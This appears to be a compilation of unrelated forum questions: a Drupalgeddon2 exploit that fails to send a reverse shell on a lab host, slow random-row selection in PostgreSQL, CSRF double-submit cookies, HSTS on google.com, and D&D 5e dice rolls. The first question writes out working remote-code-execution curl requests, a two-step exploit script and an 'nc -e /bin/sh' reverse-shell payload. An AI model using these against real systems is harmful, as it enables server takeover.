Sending a reverse shell command through the Drupalgeddon vulnerability isn’t working

I’m trying to use the Drupalgeddon2 exploit (https://gist.github.com/g0tmi1k/7476eec3f32278adc07039c3e5473708) against a Drupal 7.57 instance running on an Ubuntu machine.

The following two requests:

curl -k -s 'http://192.168.204.141/?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=whoami' \
  --data "form_id=user_pass&_triggering_element_name=name&_triggering_element_value=&opz=E-mail new Password" | grep form_build_id

curl -k -i "http://192.168.204.141/?q=file/ajax/name/%23value/${form_build_id}" \
  --data "form_build_id=${form_build_id}"

execute whoami (or any other command: ls, cd, ...) and print the result.
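(For reference, here is the whole flow as one rough shell script, including how form_build_id is captured into that variable. It is only a sketch: the IP is my lab target, whoami is the test command, and the cut field index is a guess based on Drupal’s default hidden-input markup, so it may need adjusting.)

TARGET='http://192.168.204.141'
CMD='whoami'

# Step 1: submit the poisoned password-reset form and pull form_build_id out of the response
form_build_id=$(curl -k -s "$TARGET/?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=$CMD" \
  --data 'form_id=user_pass&_triggering_element_name=name&_triggering_element_value=&opz=E-mail new Password' \
  | grep form_build_id | cut -d'"' -f6)

# Step 2: hit the ajax callback with that form_build_id; the response should contain the command output
curl -k -i "$TARGET/?q=file/ajax/name/%23value/$form_build_id" \
  --data "form_build_id=$form_build_id"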

But when I send the curl request with a reverse shell payload:

curl -k -s 'http://192.168.204.141/?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=nc -e /bin/sh 192.168.204.128 5555' \
  --data "form_id=user_pass&_triggering_element_name=name&_triggering_element_value=&opz=E-mail new Password" | grep form_build_id

It doesn’t print anything (no form_build_id), not even an error, and the target never connects back to my handler. Where do you think the problem is?

I have tried other payloads, and they all behave the same way.

What is the correct way of grabbing a RANDOM record from a PostgreSQL table that isn’t painfully slow or non-random?

I always used to do:

SELECT column FROM table ORDER BY random() LIMIT 1; 

For large tables, this was unbearably, impossibly slow, to the point of being useless in practice. That’s why I started hunting for more efficient methods. People recommended:

SELECT column FROM table TABLESAMPLE BERNOULLI(1) LIMIT 1; 

While fast, it provides worthless randomness: it appears to always pick the same damn records, so this approach is also useless.

I’ve also tried:

SELECT column FROM table TABLESAMPLE BERNOULLI(100) LIMIT 1; 

It gives even worse randomness: it picks the same few records every time, which is completely worthless. I need actual randomness.

Why is it apparently so difficult to just pick a random record? Why does it have to grab EVERY record and then sort them (in the first case)? And why do the “TABLESAMPLE” versions just grab the same stupid records all the time? Why aren’t they random whatsoever? Who would ever want to use this “BERNOULLI” stuff when it just picks the same few records over and over? I can’t believe I’m still, after all these years, asking about grabbing a random record… it’s one of the most basic possible queries.
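(For the first case, that really does seem to be what happens. If I’m reading it right, the plan for

EXPLAIN SELECT column FROM table ORDER BY random() LIMIT 1; 

is a sequential scan of the entire table feeding a sort, because random() is evaluated per row and can’t use any index; column and table are the same placeholders as above.)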

What is the actual command to use for grabbing a random record from a table in PG which isn’t so slow that it takes several full seconds for a decent-sized table?

For anti-CSRF, isn’t a session-id cookie in a hidden form field easier than a random token?

I sometimes run into sites with CSRF bugs, and I want to know the simplest fix I can recommend to the developer. (If I just tell them “switch to a framework that has anti-CSRF protection”, they won’t listen.)

Anecdotally, it looks like most sites mitigate CSRF by including a random token as a hidden form field, and then rejecting the form submission if the token isn’t present. (And it usually looks hand-crafted, not inserted by the framework.)

I’m wondering why it isn’t much more common practice to use the simpler “double-submit cookie” approach: take the session-id cookie and put it in a hidden form field, and then reject the form submission if the hidden field value doesn’t match the session-id cookie.

First, the problems with the “random token” approach, if your framework doesn’t have it built-in: You have to generate a random value and store it server-side, and in your storage table it must be associated with the user it was served to. When the form is posted, you have to check that the value is there, check it’s associated with the logged-in user, and then delete it so it can’t be re-used. If you screw up any part of this, you’ve potentially created a security hole. And, you might need to create a new database table for your tokens, which is just more cruft. (Yes, I know you can do it using hashes and secret values, but that’s also error-prone.)

By contrast, consider the ease of using the session cookie. (You don’t want to use an authentication cookie, because if the authentication cookie is stored in a hidden form field, an XSS bug might be able to read it. But a session-id cookie is probably safe.) ALL you have to do is store it in a hidden form field, and then check the value when the form is submitted.
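(To make it concrete, the check I have in mind is tiny. This is only a sketch, in Python and not tied to any particular framework; the function and parameter names are just illustrative.)

import hmac

def passes_csrf_check(session_cookie_value, hidden_field_value):
    # Reject the submission unless the hidden form field echoes the
    # session-id cookie exactly; compare_digest avoids timing leaks.
    if not session_cookie_value or not hidden_field_value:
        return False
    return hmac.compare_digest(session_cookie_value, hidden_field_value)

The rendering side is equally small: when generating the form, emit the current session id into the hidden field.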

So, I contend that IF the website in question uses a framework with session cookies, I can tell them that the easiest fix is double-submit-cookie using the session-id cookie, and that they can ignore all the web pages that usually start out by talking about how to protect against CSRF with random tokens.

Am I missing something? Does double-submit-cookie have some disadvantage?

Isn’t it a security gap if the top-level hostname doesn’t send the Strict-Transport-Security header?

If you connect to https://google.com (without www.) you get an HTTP 301 redirect to https://www.google.com/ . Then if you connect to https://www.google.com/ , the response includes the strict-transport-security header.
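(This is easy to reproduce with curl; the commands below just restate the observation above, output omitted:)

curl -sI https://google.com/        # 301 to https://www.google.com/, no strict-transport-security header
curl -sI https://www.google.com/    # strict-transport-security header present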

I contend this is a (small) security gap, because the strict-transport-security attribute never gets set for the top-level hostname, google.com. This means that no matter how many times the user has connected to google.com or www.google.com, if an attacker manages to send them to http://google.com/ , and the attacker is a man-in-the-middle who can redirect google.com to a site the attacker controls, they can eavesdrop on the connection. (Also, Google’s entry on the HSTS preload list only applies to www.google.com, not google.com.)

However, Google rejects all reports of “security holes” regarding HSTS (https://sites.google.com/site/bughunteruniversity/nonvuln/lack-of-hsts), with the statement “Migrating all the domains to HTTPS, and deprecating all clients that can only talk over plaintext HTTP takes time.”

I contend these objections make no sense. If a client only speaks http, then the way to continue supporting that client is to continue serving http. But if you serve the STS header over https connections, you’re telling the client, “Hey client, since you obviously speak https, this host promises it will always serve you https in the future and you should always make https requests to me.” The only valid reason not to serve the STS header would be if you think the hostname might some day not support https any more, which is hopefully not the case for google.com!

Perhaps there are subdomains of google.com that don’t support https. But then google.com can just serve the STS header without the “includeSubDomains” attribute, so it won’t be applied to subdomains.
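In other words, google.com could send something like this (the max-age value here is only an example):

Strict-Transport-Security: max-age=31536000 

and the policy would apply to google.com itself and not to any subdomain.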

So I maintain that: 1) Not serving the STS header for the hostname google.com is a security gap. While it’s a small gap, there is no offsetting legitimate reason not to serve the header. 2) It is not a valid objection that they “want to keep supporting clients that only talk over plaintext HTTP”. 3) It is not a valid objection that they have not migrated other subdomains to https yet.

Am I missing something?

Do characters know they did a poor job if the result of a dice roll isn’t automatically obvious?

During a discussion I had with @jgn, prompted by the question about rolling twice on an Investigation check, I realized we were operating with entirely different ideas of how dice rolls actually function within the narrative of the game.

For example:

A fighter searches a room he’s never been in before. If he rolls a 15, he’ll find the hidden switch that opens the secret laboratory of the mad doctor Fred. He rolls and it’s a 3, so he does not find the secret switch.

My point of view is that the fighter did his best to find something special about the room, didn’t find anything, and has no reason to roll again; he’d get a new try, or find it automatically, if somebody later informed him about the hidden switch in the room.

@jgn’s point of view is that the fighter is aware of the fact that he did a poor job searching the room and can keep trying until he is confident that he did a good job. In essence, the fighter “knows” the dice roll and will stop trying when he rolls high enough.

To me, the latter approach seems like it would be better served by taking 10 (a passive Investigation check), and refluffing “oh, I rolled a 1, I did a poor job searching, I’ll roll again!” is essentially fishing for advantage based on metagame information.

In earlier editions, “try until you are 100% certain you gave it your best” was done with taking 20, but that no longer exists in 5e.

So which, exactly, is the official D&D 5e stance?

Do characters know they did a poor job because of low dice rolls if a failed roll gives them no new information?